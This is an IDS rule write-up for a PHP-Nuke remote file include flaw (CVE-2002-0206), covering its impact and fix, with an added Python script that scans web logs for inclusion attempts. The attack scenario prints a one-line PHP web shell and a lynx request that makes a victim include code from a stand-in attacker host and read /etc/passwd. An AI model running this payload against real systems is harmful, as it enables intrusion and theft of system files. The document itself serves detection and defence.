GEN:SID 1:1399
Message WEB-PHP PHP-Nuke remote file include attempt
Summary A remote machine has possibly attempted to include a remote file as part of
PHP-nuke index.php.
Impact Possible file disclosure, or command execution at the privilege level of
the user running the webserver.
Detailed Information The index.php included with PHP-nuke allows inclusion of additional files.
Normal usage might be situations where a webmaster wants to include
additional code in their index.php.  This can be done via
"index.php?file=<path_to_file>".  PHP-nuke also allows inclusion of files
from remote sources specified by either ftp or http as the transport
protocol.  This allows attackers to craft their own php file (say, foo.php)
and store it remotely (say, http://mysite.org/foo.php) and then instruct
the victim machine to include foo.php as part of its source.  Any code in
foo.php will get executed on the victim machine.

Affected Systems  
Attack Scenarios In an attempt to gain access to a remote site that happens to use PHP-nuke,
an attacker crafts the following foo.php, and places it on a website that
he controls:
    
    <?php
    system($cmd);
    ?>

The attacker can then include foo.php as part of a remote site's index.php
that uses PHP-nuke, and execute any command:

    lynx \
    http://victim.com/index.php?file=http://attacker.org/foo.php?cmd=cat%20/etc/passwd
    
Ease of Attack Anyone with access to a web browser and a publicly available web server on
which they have the ability to make files viewable from the web.

Corrective Action If you run PHP-nuke, either upgrade to the latest revision, or edit the
source to remove support for file inclusion.  Check your web logs for
attempted file inclusion.  If found, investigate this as a possible
system-level intrusion.
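
The log check recommended above, as an added example (not part of the original rule documentation): a Python scan of access-log lines for requests to index.php whose file parameter decodes to an http or ftp URL. The sample log lines are constructed, the function names are hypothetical, and matching https as well is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request target inside the quoted request field of a common/combined log line.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+)')
# Transports named in the advisory (http, ftp); https is added as an assumption.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def remote_include_target(log_line):
    """Return the remote URL passed as file= to index.php, or None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    try:
        target = urlsplit(m.group(1))
    except ValueError:  # malformed request target, nothing to parse
        return None
    if not target.path.lower().endswith("/index.php"):
        return None
    # parse_qsl percent-decodes, so file=http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == "file" and REMOTE_RE.match(value):
            return value
    return None

def find_remote_includes(lines):
    """Return (line_number, remote_url) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        url = remote_include_target(line)
        if url is not None:
            hits.append((number, url))
    return hits

# Constructed sample log lines (addresses are from documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Feb/2002:13:55:36 -0500] "GET /index.php?file=http://attacker.org/foo.php?cmd=cat%20/etc/passwd HTTP/1.0" 200 2326',
    '192.0.2.11 - - [10/Feb/2002:13:56:02 -0500] "GET /nuke/index.php?op=x&file=FTP%3A%2F%2Fattacker.example%2Ffoo.php HTTP/1.0" 200 512',
    '198.51.100.7 - - [10/Feb/2002:13:57:10 -0500] "GET /index.php?file=docs/faq.html HTTP/1.0" 200 4096',
    '198.51.100.8 - - [10/Feb/2002:13:57:11 -0500] "GET /images/logo.gif HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for number, url in find_remote_includes(SAMPLE_LOG):
        print(f"line {number}: remote include of {url}")
```

Parameters sent in a POST body do not appear in access logs, so this covers only inclusion attempts carried in the request URL.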
Additional References  
Rule References bugtraq: 3889
cve: 2002-0206